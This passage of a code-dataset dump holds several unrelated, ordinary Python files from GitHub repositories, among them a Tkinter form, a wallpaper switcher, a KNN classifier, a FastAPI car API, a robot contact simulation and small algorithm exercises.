datos\nframe=Frame(root,width=380,height=430,bg=\"white\")\nframe.place(x=480,y=70)\n\n# Titulo del formulario\n# fg = color\n# bg = color de fondo\n# font = fuente\nheading=Label(frame,text='Texto',fg='#57a1f8',bg='white',font=('Microsoft Yahei UI Light',23,'bold'))\nheading.place(x=125,y=5)\n\n#===========================================================================================\n#Funciones limpieza\ndef user_input(e):\n user.delete(0,'end')\n\ndef code_input(e):\n code.delete(0,'end')\n\ndef number_input(e):\n number.delete(0,'end')\n\ndef num_input(e):\n num.delete(0,'end')\n\ndef method_input(e):\n method.delete(0,'end')\n\n\n#Funciones para rellanar\ndef user_info(e):\n input = user.get()\n if input =='':\n user.insert(0,'texto:')\n\ndef code_info(e):\n input1 = code.get()\n if input1 =='':\n code.insert(0,'texto2:')\n\n\ndef number_info(e):\n input2 = number.get()\n if input2 =='':\n number.insert(0,'texto3:')\n\n\ndef method_info(e):\n input4 = method.get()\n if input4 == '':\n method.insert(0,'texto4:')\n\ndef num_info(e):\n input3 = num.get()\n if input3 == '':\n num.insert(0,'texto5:')\n\n\n#Definicion de funcion para nueva GUI dentro de otra\n\n\ndef showPdf():\n input1 = user.get()\n input2 = code.get()\n input3 = number.get()\n input4 = method.get()\n input5 = num.get()\n\n print(len(input1))\n print(len(input2))\n\n\n #todo:realizar mas validaciones\n if len(input1)>1:\n screen = Toplevel(root)\n screen.title(\"PDF\")\n screen.geometry('925x500+300+200')\n screen.config(bg=\"white\")\n screen.resizable(False,False)\n\n\n #Elementos que llevara la GUI\n img = PhotoImage(file='logoPDF.png')\n Label(screen, image=img, bg='white').place(x=250, y=20)\n Label(screen, text='PDF generado', bg='#fff', font=('Calibri(Body)', 50, 'bold')).place(x=250,y=320)\n\n\n def regresar():\n screen.destroy()\n 
\n        frame1 = Frame(screen, width=300, height=80, bg=\"white\")\n        frame1.place(x=345, y=410)\n        Button(frame1,width=30, pady=7, text='Introducir otra funcion', bg='#57a1f8', fg='white', border=0,command=regresar).place(x=0, y=0)\n\n        screen.mainloop()\n\n# ===========================================================================================\n\n# First input\nuser = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nuser.place(x=30,y=80)\nuser.insert(0,'texto')\nuser.bind('<FocusIn>',user_input)\nuser.bind('<FocusOut>',user_info)\n\n# Line under the input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=107)\n\n# ===========================================================================================\n\n# Second input\ncode = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\ncode.place(x=30,y=150)\ncode.insert(0,'texto2:')\ncode.bind('<FocusIn>',code_input)\ncode.bind('<FocusOut>',code_info)\n\n# Line under the input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=177)\n# ===========================================================================================\nnumber = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nnumber.place(x=30,y=220)\nnumber.insert(0,'texto3:')\nnumber.bind('<FocusIn>',number_input)\nnumber.bind('<FocusOut>',number_info)\n\n# Line under the input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=247)\n# ===========================================================================================\nmethod = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nmethod.place(x=30,y=290)\nmethod.insert(0,'texto4:')\nmethod.bind('<FocusIn>',method_input)\nmethod.bind('<FocusOut>',method_info)\n\n# Line under the input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=317)\n# ============================================================================================\nnum = Entry(frame,width=25,fg='black',border=0,bg=\"white\",font=('Microsoft Yahei UI Light',11))\nnum.place(x=30,y=350)\nnum.insert(0,'texto5:')\nnum.bind('<FocusIn>',num_input)\nnum.bind('<FocusOut>',num_info)\n\n# Line under the input\nFrame(frame,width=295,height=2,bg='black').place(x=25,y=377)\n\n#============================================================================================\n\n# Button\nButton(frame,width=41,pady=7,text='Generar PDF',bg='#57a1f8',fg='white',border=0,command=showPdf).place(x=35,y=395)\n\n\n\n\n# Display the main window\nroot.mainloop()\n\n\n","repo_name":"Bryaan159/TkinterPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73348452347","text":"import threading\n\n\nclass Singleton(type):\n    \"\"\"\n    The singleton class to initialize a singleton object.\n    \"\"\"\n    _instance_lock = threading.Lock()\n\n    def __init__(cls, *args, **kwargs):\n        \"\"\"The singleton base class initializer\"\"\"\n        cls._instance = None\n        super(Singleton, cls).__init__(*args, **kwargs)\n\n    def __call__(cls, *args, **kwargs):\n        \"\"\"\n        Intercepts instantiation of classes that use this metaclass and, with\n        double-checked locking, creates the single shared instance on first use\n        \"\"\"\n        if cls._instance is None:\n            with Singleton._instance_lock:\n                if cls._instance is None:\n                    cls._instance = super(Singleton, cls).__call__(*args, **kwargs)\n        return cls._instance
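\n\n\n# Usage sketch (added illustration; \"AppConfig\" is a hypothetical example class,\n# not part of this module): a class opts in by declaring Singleton as its\n# metaclass, after which every instantiation returns the same shared object.\n#\n# class AppConfig(metaclass=Singleton):\n#     pass\n#\n# assert AppConfig() is AppConfig()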
\n","repo_name":"openeuler-mirror/gala-anteater","sub_path":"anteater/utils/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21831640754","text":"\"\"\" Changes wallpapers \"\"\"\n\nimport os\nfrom ctypes import windll\n\ndef file_extension(file, *args):\n\t\"\"\" Returns the file extension of a given file \"\"\"\n\tchar = args[0] if args else '.'\n\ttry:\n\t\treturn file[-(list(file[::-1]).index(char)+1):]\n\texcept ValueError:\n\t\treturn '.png'\n\ndef usable_walls(path):\n\t\"\"\" Returns all the usable wallpapers \"\"\"\n\tusable_walls = []\n\tfor file in os.listdir(path):\n\t\tif file not in ('Current', 'refuse.txt') and file[:4] != 'used' and file[-3:] != 'lnk':\n\t\t\tusable_walls.append(file)\n\treturn usable_walls\n\ndef need_new_walls(path):\n\t\"\"\" Checks whether there are no usable walls left \"\"\"\n\treturn len(usable_walls(path)) == 0\n\ndef move(root, cur):\n\t\"\"\" Moves the wallpaper from the root dir to the 'Current' dir \"\"\"\n\tnew_wall = usable_walls(root)[0]\n\ttry:\n\t\tcurrent_wall = usable_walls(cur)[0]\n\texcept IndexError:\n\t\topen(root+'Current/current.png','x')\n\t\tcurrent_wall = usable_walls(cur)[0]\n\tif current_wall[-4:] != '.txt':\n\t\tos.rename(cur+current_wall, root+'used'+new_wall[:-len(file_extension(new_wall))]+file_extension(current_wall))\n\telse:\n\t\tpass\n\tos.rename(root+new_wall, cur+'current'+file_extension(new_wall))\n\ndef set_wall(file):\n\t\"\"\" Sets the wall in 'Current' as wallpaper \"\"\"\n\twindll.user32.SystemParametersInfoW(20, 0, file, 0)\n\ndef delete_files(path):\n\t\"\"\" Deletes all wallpapers that were used \"\"\"\n\tflagged = []\n\tfor file in os.listdir(path):\n\t\tif file[:4] == 'used':\n\t\t\tflagged.append(file)\n\tfor file in flagged[::-1]:\n\t\tos.remove(path+'/'+file)\n","repo_name":"PhoenixFlame101/Wallpaper-Switcher","sub_path":"local_functions.py","file_name":"local_functions.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7615757294","text":"import io\nimport sys\nimport argparse\n\nsys.path.append('./lib/')\nfrom Rtree import Rtree\nfrom Point import Point\nfrom Service import Service\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"db\", help=\"database file to get map info from\", type=str)\nparser.add_argument(\"lat\", help=\"latitude of a place\", type=float)\nparser.add_argument(\"long\", help=\"longitude of a place\", type=float)\nparser.add_argument(\"size\", help=\"radius of a sector\", type=int)\nparser.add_argument(\"--typeR\", help=\"type of objects to look for\", type=str)\nargs = parser.parse_args()\n\ndef parse(file_name):\n    with io.open(file_name, encoding='utf-8') as file:\n        data = file.read().split('\\n')\n        data = [field.split(';') for field in data[:-1]]\n    return data\n\nrtree = Rtree(5)\ndata = parse('./data/' + args.db)\nfor service in data:\n    rtree.insert(Service(Point(float(service[0]), float(service[1])), service[2], service[3], service[4], service[5]))\nprint('Rtree built')\n\nif args.typeR is not None:\n    res, distance = rtree.findType(Point(args.lat, args.long), args.size, args.typeR)\n    print('=====================')\n    print('Name:', res.name)\n    print('Type:', res.type)\n    print('Subtype:', res.subtype)\n    print('Address:', res.address)\n    print('Distance: %.0f m' % distance)\nelse:
\n    res = rtree.find(Point(args.lat, args.long), args.size)\n    for service in res:\n        print('=====================')\n        print('Name:', service.name)\n        print('Type:', service.type)\n        print('Subtype:', service.subtype)\n        print('Address:', service.address)\n","repo_name":"Tariod/what-is-near","sub_path":"what-is-near.py","file_name":"what-is-near.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14676606484","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix, f1_score\nfrom sklearn.model_selection import train_test_split\n\n\n\n# functions:\n\n# returns the f1 score of a knn fit\ndef knn_f1score(n, insect_test_x, insect_test_y, insect_train_x, insect_train_y):\n    #trains the algorithm\n    classifier = KNeighborsClassifier(n_neighbors=n)\n    classifier.fit(insect_train_x, insect_train_y)\n\n    #predict the test dataset\n    predicted = classifier.predict(insect_test_x)\n\n    return (f1_score(insect_test_y, predicted, average='macro') * 100)\n\n#converts the hours to minutes and adds them to the minutes column, leaving a single time column\ndef cleaning_data(insect_dataset):\n    insect_dataset['Minutes'] = insect_dataset['Minutes'] + (insect_dataset['Hour'] * 60)\n    del insect_dataset['Hour']\n    return insect_dataset\n\n#separates the insect labels as y and the remaining columns as x\ndef separating_x_and_y(insect_dataset):\n    x = insect_dataset.iloc[:,:7]\n    y = insect_dataset.loc[:,'Insect']\n    return x, y\n\n#finding the best K for KNN algorithm\ndef finding_best_k(insect_test_x, insect_test_y, insect_train_x, insect_train_y):\n    k_list:list = []\n    score:list = []\n    for i in range(1,20):\n        k_list.append(i)\n        score.append(knn_f1score(i, insect_test_x, insect_test_y, insect_train_x, insect_train_y))\n    total_score = pd.DataFrame({'k_list' : k_list, 'SCORE':score})\n    sorted_values_by_score = total_score.sort_values(by='SCORE', ascending=False)\n    return int(sorted_values_by_score['k_list'].loc[sorted_values_by_score.index[0]])\n\n#predicts the test dataset\ndef predict_with_knn(k, x_train, y_train , insect_dataset_test):\n    classifier = KNeighborsClassifier(n_neighbors=k)\n    classifier.fit(x_train, y_train)\n    y_predicted = classifier.predict(insect_dataset_test)\n    return y_predicted\n\n\n\n\n# main:\n\n#import the data\ninsect_dataset_train = pd.read_csv(\"train.csv\", index_col=0, parse_dates=True)\ninsect_dataset_test = pd.read_csv(\"test_x.csv\", index_col=0, parse_dates=True)\n\n#cleaning data\ninsect_dataset_train = cleaning_data(insect_dataset_train)\ninsect_dataset_test = cleaning_data(insect_dataset_test)\n\n#separates x and the target from the training dataset\nx, y = separating_x_and_y(insect_dataset_train)\n\n#shuffle the training data and split it to have a training set for the KNN algorithm and another one for testing it\ninsect_train_x, insect_test_x, insect_train_y, insect_test_y = train_test_split(x, y, test_size=0.2, random_state=2020)\n\n#find best k\nk = finding_best_k(insect_test_x, insect_test_y, insect_train_x, insect_train_y)\n\n#predicts dataset\nprediction = predict_with_knn(k, x, y, insect_dataset_test)\n\n#create the result dataframe\nresult = pd.DataFrame({'Test_index': insect_dataset_test.index, 'Prediction': prediction})\n\n#export the csv\nresult.to_csv('results.csv', index=
False)","repo_name":"marc-1212/JOBarcelona_22_KNN","sub_path":"insectos_JOBarcelona_22.py","file_name":"insectos_JOBarcelona_22.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36271740870","text":"#pylint: disable=unused-import\nimport random\nfrom board import GameOver, TetrisBoard, WIDTH, HEIGHT\nfrom tetrominoes import tetrominoes as tets, tetlist, Tetromino, OrientedTetromino\n\nclass TetrisGameState:\n def __init__(self):\n self.score = 0\n self.board = TetrisBoard()\n self.tet_iq = list(range(7))\n random.shuffle(self.tet_iq)\n self.next_tet = tetlist[self.tet_iq.pop()]\n self.tet = tetlist[self.tet_iq.pop()]\n\n def next_tetromino(self):\n self.tet = self.next_tet\n try:\n self.next_tet = tetlist[self.tet_iq.pop()]\n except IndexError:\n self.tet_iq = list(range(7))\n random.shuffle(self.tet_iq)\n self.next_tet = tetlist[self.tet_iq.pop()]\n\n def make_move(self, orient, col) -> 'tuple[TetrisBoard, int, list[int]]':\n self.board.place_tetromino(self.tet, orient, col)\n cleared = self.board.get_cleared_lines()\n old_board = self.board.copy()\n if cleared:\n reward = self.board.score(cleared)\n self.board.remove_cleared_lines(cleared)\n else:\n reward = 0\n self.next_tetromino()\n return old_board, reward, cleared\n\n def generate_move_context(self, orient, col) -> 'tuple[bool, TetrisBoard, int, list[int]]':\n context = {}\n try:\n board, yi, cleared = self.board.test_place_tetromino(self.tet, orient, col)\n return False, board, yi, cleared\n except GameOver:\n return True, None, None, None\n return context\n\n def get_moves(self):\n for orient in range(self.tet.n_orientations()):\n for col in range(WIDTH):\n if col + self.tet[orient].width <= WIDTH:\n yield orient, col","repo_name":"murtaza64/sirtet","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39059780677","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 23/08/2021\n\n@author: Michalina Pacholska\n\nThis module is designed to be expanded with different wave models, as long as\ntheir propagation can be described via matrix theory. 
Thus, the Planar Wave\nalso describes its propagation through empty space and its refraction at\nthe boundary via matrix theory.\n\nEach propagation can be described in two representations:\n - a forward in space model, we call it a forward model (incoming and outgoing\n   waves known on one end of the boundary)\n - a forward in time model, we call it a backward model (incoming waves known\n   on both ends of the boundary)\n\n In order to switch between the propagation models use `swap_waves`\n\n\"\"\"\n\nimport numpy as np\nimport wave as w\n\n\ndef change_basis(matrix: np.ndarray) -> np.ndarray:\n    \"\"\" Change basis between forward and backward representations of propagation matrices.\n\n    Args:\n        matrix: a 2x2 matrix in any representation (forward or backward)\n\n    Returns:\n        a 2x2 matrix in the different representation than matrix\n\n    \"\"\"\n    result = np.empty_like(matrix, dtype=complex)\n    result[0, 0] = matrix[0, 0] * matrix[1, 1] - matrix[0, 1] * matrix[1, 0]\n    result[0, 1] = matrix[0, 1]\n    result[1, 0] = -matrix[1, 0]\n    result[1, 1] = 1.0\n    return result / matrix[1, 1]\n\n\ndef identity_matrix(wave: w.PlanarWave = None):\n    \"\"\"Create an identity propagation matrix for every wavenumber in the grid.\"\"\"\n    if wave is not None:\n        matrix = np.zeros((2, 2, len(wave.k)), dtype=complex)\n    else:\n        matrix = np.zeros((2, 2, len(w.PlanarWave.k)), dtype=complex)\n    matrix[0, 0] = 1\n    matrix[1, 1] = 1\n    return matrix\n\n\ndef single_propagation_matrix(k: float, n: complex, dz: float, backward: bool = False) -> np.ndarray:\n    \"\"\"Create a propagation matrix for a single wavenumber k\n\n    Args:\n        k: wavenumber for which the matrix is created\n        n: index of refraction of the layer\n        dz: depth of the layer\n        backward: if True use backward model (see the module documentation)\n\n    Returns:\n        2x2 propagation matrix for the given wavenumber\"\"\"\n    matrix = np.zeros((2, 2), dtype=complex)\n    phi = n * dz * k\n    matrix[0, 0] = np.exp(1j * phi)\n    if not backward:\n        matrix[1, 1] = np.exp(-1j * phi)\n    else:\n        matrix[1, 1] = np.exp(1j * phi)\n    return matrix\n\n\ndef propagation_matrix(\n    n: complex,\n    dz: float,\n    backward: bool = False,\n    wave: w.PlanarWave = None,\n) -> np.ndarray:\n    \"\"\"\n    Create 3D tensor of propagation matrices for all wavenumbers\n\n    Args:\n        n: index of refraction of the layer\n        dz: depth of the layer\n        backward: if True use backward model (see the module documentation)\n        wave: optional wave whose wavenumber grid is used instead of the class default\n\n    Returns:\n        3D tensor of propagation matrices for all wavenumbers, of dimensions (2, 2, # wavenumbers)\n    \"\"\"\n\n    ks = w.PlanarWave.k\n    if wave is not None:\n        ks = wave.k\n    matrix = np.zeros((2, 2, len(ks)), dtype=complex)\n    phi = n * dz * ks\n    matrix[0, 0, :] = np.exp(1j * phi)\n    if not backward:\n        matrix[1, 1, :] = np.exp(-1j * phi)\n    else:\n        matrix[1, 1, :] = np.exp(1j * phi)\n    return matrix\n\n\ndef boundary_matrix(n1: complex, n2: complex, backward: bool = False) -> np.ndarray:\n    \"\"\"\n    Create a matrix of reflection on the boundary (wavenumber independent)\n\n    Args:\n        n1: index of refraction of the first layer\n        n2: index of refraction of the second layer\n        backward: if True use backward model (see the module documentation)\n\n    Returns:\n        matrix of reflection on the boundary, of dimensions (2, 2)\n    \"\"\"\n\n    matrix = np.zeros((2, 2), dtype=complex)\n    if not backward:\n        matrix[0, 0] = n1 + n2\n        matrix[0, 1] = n2 - n1\n        matrix[1, 0] = n2 - n1\n        matrix[1, 1] = n1 + n2\n        matrix = matrix / (2 * n2)\n    else:\n        matrix[0, 0] = 2 * n1\n        matrix[0, 1] = n2 - n1\n        matrix[1, 0] = n1 - n2\n        matrix[1, 1] = 2 * n2\n        matrix = matrix / (n1 + n2)\n    return matrix
\n\n\ndef reflection_matrix(r: float, backward: bool = False) -> np.ndarray:\n    \"\"\"\n    Create a matrix describing reflection given the reflectivity;\n    does not include propagation through the material\n\n    Args:\n        r: reflectivity\n        backward: if True use backward model (see the module documentation)\n\n    Returns:\n        2x2 reflection matrix in the chosen representation\n    \"\"\"\n    assert (r <= 1)\n    assert (r >= 0)\n    matrix = np.zeros((2, 2), dtype=complex)\n    if not backward:\n        matrix[0, 0] = 1 - 2 * r\n        matrix[0, 1] = r\n        matrix[1, 0] = -r\n        matrix[1, 1] = 1\n        matrix = matrix / (1 - r)\n    else:\n        matrix[0, 0] = 1 - r\n        matrix[0, 1] = r\n        matrix[1, 0] = r\n        matrix[1, 1] = 1 - r\n    return matrix\n\n\ndef swap_waves(matrix, forward_wave, backward_wave):\n    incoming = np.array([forward_wave.s, backward_wave.s])\n    outgoing = np.einsum('ijk,jk->ik', matrix, incoming)\n    return forward_wave, w.PlanarWave(outgoing[1])\n","repo_name":"micha7a/femto-lippmann","sub_path":"propagation.py","file_name":"propagation.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74128358268","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ndir = [[-1,0],[1,0],[0,1],[0,-1]]\r\ndef outrange(i,j,s,d):\r\n\r\n    dx, dy = dir[d-1]\r\n    if d == 1 or d == 2:\r\n        s = s % ((R-1)*2)\r\n    elif d == 3 or d == 4:\r\n        s = s % ((C-1)*2)\r\n    while True:\r\n        if -1 < i+dx*s < R and -1 < j+dy*s < C:\r\n            return (i+dx*s, j+dy*s, d)\r\n\r\n        if d == 1:\r\n            s -= i  # move to the topmost row first\r\n            dx, dy = 1, 0  # and reverse the direction\r\n            i = 0\r\n            d = 2\r\n\r\n        elif d == 2:  # move to the bottommost row\r\n            s -= (R-1-i)\r\n            dx, dy = -1, 0\r\n            i = R-1\r\n            d = 1\r\n        elif d == 3:  # move to the rightmost column\r\n            s -= (C-1-j)\r\n            dx, dy = 0, -1\r\n            j = C - 1\r\n            d = 4\r\n        elif d == 4:  # move to the leftmost column\r\n            s -= j\r\n            dx, dy = 0, 1\r\n            j = 0\r\n            d = 3\r\n\r\n\r\n\r\nR, C, M = map(int,input().split())\r\nboard = [[0]*C for _ in range(R)]\r\n\r\nfor _ in range(M):\r\n    r,c,s,d,z = map(int,input().split())\r\n    board[r-1][c-1] = [s,d,z]\r\n\r\nresult = 0\r\nfor j in range(C):\r\n    for i in range(R):\r\n        if board[i][j] != 0:\r\n            result += board[i][j][2]\r\n            board[i][j] = 0\r\n            break\r\n\r\n    new_board = [[0]*C for _ in range(R)]\r\n    for i in range(R):\r\n        for j in range(C):\r\n            if board[i][j] != 0:\r\n                s = board[i][j][0]\r\n                nx, ny, d = outrange(i,j,s,board[i][j][1])\r\n                if new_board[nx][ny] == 0:\r\n                    new_board[nx][ny] = [board[i][j][0],d,board[i][j][2]]\r\n\r\n                else:\r\n                    if new_board[nx][ny][2] < board[i][j][2]:\r\n                        new_board[nx][ny] = [board[i][j][0],d,board[i][j][2]]\r\n\r\n    board = [item[:] for item in new_board]\r\n\r\n\r\nprint(result)","repo_name":"Dayeon1351/TIL","sub_path":"BAEKJOON/17143.py","file_name":"17143.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25265533308","text":"# add dependencies\nimport csv\nimport os\n\n# Assign a variable to load a file from our path\nfile_to_load = os.path.join(\"Resources\" , \"election_results.csv\")\n\n#assign a variable to save the file to a path\nfile_to_save = os.path.join(\"analysis\" , \"election_analysis.txt\")\n\n# Open the election results and read the file\nwith open(file_to_load) as election_data:\n    # To do analysis with the data\n    # To print each row in the csv file\n    # for row in file_reader:\n        # print(row)\n# To print first item from each row\n# for row in file_reader:\n    # print(row[0])\n# To print the header row\n    # Read the file object with the reader function
\n    file_reader = csv.reader(election_data)\n    headers = next(file_reader)\n    print(headers)\n\n","repo_name":"Malvi1497/Election_analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"857465917","text":"from typing import Any\n\nfrom fastapi import FastAPI, HTTPException, Query\n\nfrom seez.domain.commands.add_car import AddCar\nfrom seez.domain.commands.get_cars_paged import GetCarsPaged\nfrom seez.domain.commands.get_makes import GetAllMakes\nfrom seez.domain.commands.get_models import GetAllModels\nfrom seez.domain.commands.get_submodels import GetAllSubModels\nfrom seez.domain.dto import AddCarDTO\nfrom seez.domain.exceptions import MakeDoesNotExist\n\napp = FastAPI()\n\n\n@app.get(\"/car/\")\ndef list_cars(\n    page_number: int = Query(1, title=\"Page number\", ge=1),\n    page_size: int = Query(20, title=\"Page size\", ge=1),\n    price_min: int = Query(None, title=\"Price min\", ge=0),\n    price_max: int = Query(None, title=\"Price max\", ge=0),\n    mileage_min: int = Query(None, title=\"Mileage min\", ge=0),\n    mileage_max: int = Query(None, title=\"Mileage max\", ge=0),\n) -> Any:\n    return GetCarsPaged(\n        page_number=page_number,\n        page_size=page_size,\n        price_min=price_min,\n        price_max=price_max,\n        mileage_min=mileage_min,\n        mileage_max=mileage_max,\n    ).handle()\n\n\n@app.post(\"/car/\")\ndef add_car(add_car: AddCarDTO) -> None:\n    try:\n        AddCar(add_car_dto=add_car).handle()\n    except MakeDoesNotExist:\n        raise HTTPException(status_code=400, detail=\"This Make does not exist\")\n\n\n@app.get(\"/make/\")\ndef list_makes() -> Any:\n    return GetAllMakes().handle()\n\n\n@app.get(\"/model/\")\ndef list_models() -> Any:\n    return GetAllModels().handle()\n\n\n@app.get(\"/submodel/\")\ndef list_submodels() -> Any:\n    return GetAllSubModels().handle()
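\n\n\n# Example request against the paging endpoint (added illustration; host and\n# values are assumed, not taken from the project):\n#\n#   GET /car/?page_number=2&page_size=10&price_max=50000\n#\n# FastAPI validates each query parameter against the constraints declared in\n# list_cars before the GetCarsPaged command is built and handled.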
\n","repo_name":"kbudaj/seez","sub_path":"seez/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27259598070","text":"\"\"\"We are the captains of our ships, and we stay 'till the end. We see our stories through.\"\"\"\n\"\"\"Method 1: the input linked lists are modified (reversed in place), added digit\nby digit, and the result is reversed back.\"\"\"\n\nclass ListNode:\n\n    def __init__(self, val):\n        self.val = val\n        self.next = None\n\nclass LinkedList:\n\n    def __init__(self):\n        self.head = None\n\n    def push(self, val):\n        new_node = ListNode(val)\n        if not self.head:\n            self.head = new_node\n            return\n        mover = self.head\n        while mover.next:\n            mover = mover.next\n        mover.next = new_node\n\n    def reverse(self, head):\n        prev_node = next_node = None\n        curr_node = head\n        while curr_node:\n            next_node = curr_node.next\n            curr_node.next = prev_node\n            prev_node = curr_node\n            curr_node = next_node\n        new_head = prev_node\n        return new_head\n\n    def add_two_numbers(self, head_1, head_2):\n        rev_mover_1 = self.reverse(head_1)\n        rev_mover_2 = self.reverse(head_2)\n        result_head = result_mover = None\n        carry = 0\n        while rev_mover_1 and rev_mover_2:\n            summ = (rev_mover_1.val + rev_mover_2.val + carry) % 10\n            sum_node = ListNode(summ)\n            carry = (rev_mover_1.val + rev_mover_2.val + carry) // 10\n            if not result_head:\n                result_head = result_mover = sum_node\n                rev_mover_1 = rev_mover_1.next\n                rev_mover_2 = rev_mover_2.next\n                continue\n            result_mover.next = sum_node\n            result_mover = result_mover.next\n            rev_mover_1 = rev_mover_1.next\n            rev_mover_2 = rev_mover_2.next\n\n        result_mover, carry = self.handle_longer_list(result_mover, rev_mover_1, carry)\n        result_mover, carry = self.handle_longer_list(result_mover, rev_mover_2, carry)\n\n        if carry:\n            result_mover.next = ListNode(1)\n        result_head = self.reverse(result_head)\n        return result_head\n\n    def handle_longer_list(self, result_mover, rev_mover, carry):\n        while rev_mover:\n            sum_node = ListNode((rev_mover.val + carry) % 10)\n            carry = (rev_mover.val + carry) // 10\n            result_mover.next = sum_node\n            result_mover = result_mover.next\n            rev_mover = rev_mover.next\n        return (result_mover, carry)\n\n    def print_list(self, head):\n        mover = head\n        while mover:\n            print(mover.val, end=\" \")\n            mover = mover.next\n        print()\n\nif __name__ == \"__main__\":\n    l1 = LinkedList()\n    l1.push(1)\n    l1.push(2)\n    l1.push(3)\n    l2 = LinkedList()\n    l2.push(4)\n    l2.push(5)\n    result_head = l1.add_two_numbers(l1.head, l2.head)\n    l1.print_list(result_head)","repo_name":"asperaa/back_to_grind","sub_path":"Linked_List/add_two_num_2.py","file_name":"add_two_num_2.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30167665566","text":"import numpy as np\nfrom robot import FD, animate_robot, plt, gr, J, ID\n\n\"\"\"\n\nThis script demonstrates how a robot controller responds when an\nexternal force is applied at the end-effector.
\nThe controller attempts\nto maintain the initial robot position, and at the 200th iteration, an\nexternal force is temporarily applied for a short amount of time.\n\n\"\"\"\n\ndef main():\n\n    n = 1000 # number of steps\n    dt = 0.01 # time step\n\n    theta10, theta20 = np.deg2rad([45, 90]) # initial robot configuration\n\n    Theta1 = np.zeros(n)\n    Theta2 = np.zeros(n)\n    Theta1[0] = theta10\n    Theta2[0] = theta20\n\n    dTheta1 = np.zeros(n)\n    dTheta2 = np.zeros(n)\n\n    ddTheta1 = np.zeros(n)\n    ddTheta2 = np.zeros(n)\n\n    Fext = np.array([30, 0]) # external contact force at end-effector\n    i_start = 200 # iteration that the external contact force is applied from\n    i_end = 250 # iteration that the external contact force is applied till\n\n    def tau_ctrl(theta1, theta2, dtheta1, dtheta2):\n        \"\"\"Control (computed torque control) - move robot to goal\"\"\"\n        K = 100 # stiffness gain\n        D = 10 # damping gain\n        return ID(theta10, theta20, 0, 0, K*(theta10 - theta1) - D*dtheta1, K*(theta20 - theta2) - D*dtheta2)\n\n    for i in range(n-1):\n\n        tau1, tau2 = tau_ctrl(Theta1[i], Theta2[i], dTheta1[i], dTheta2[i])\n\n        if i_start < i < i_end:\n            # apply external contact force at end-effector\n            tau_ext = J(Theta1[i], Theta2[i]).T@Fext\n            tau1 += tau_ext[0]\n            tau2 += tau_ext[1]\n\n        ddtheta1, ddtheta2 = FD(Theta1[i], Theta2[i], dTheta1[i], dTheta2[i], tau1, tau2)\n\n        ddTheta1[i+1] = ddtheta1\n        ddTheta2[i+1] = ddtheta2\n\n        dTheta1[i+1] = dTheta1[i] + dt*ddtheta1\n        dTheta2[i+1] = dTheta2[i] + dt*ddtheta2\n\n        Theta1[i+1] = Theta1[i] + dt*dTheta1[i]\n        Theta2[i+1] = Theta2[i] + dt*dTheta2[i]\n\n    fig, ax = plt.subplots(tight_layout=True)\n    animate_robot(fig, ax, Theta1, Theta2, interval=dt*1000)\n\n    plt.show()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"cmower/two_dof_robot","sub_path":"contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8412903933","text":"arr = [4,3,2,1]\nn = len(arr)\n\ndef quicksort(arr, start, end):\n    if start < end:\n        pivot_pos = partition(arr, start, end)\n\n        quicksort(arr, start, pivot_pos-1)\n        quicksort(arr, pivot_pos+1, end)\n\ndef partition(arr, start, end):\n    pivot = arr[end]\n    i = start - 1\n\n    for j in range(start, end):\n        if arr[j] <= pivot:\n            i += 1\n            arr[i], arr[j] = arr[j], arr[i]\n    arr[end], arr[i+1] = arr[i+1], arr[end]\n    return i + 1\n\nquicksort(arr, 0, n-1)\nprint(arr)\n\n# Note: partition picks the rightmost element as the pivot and rearranges the\n# list so that elements less than or equal to the pivot end up to its left and\n# larger ones to its right; it then recursively sorts the left and right parts.
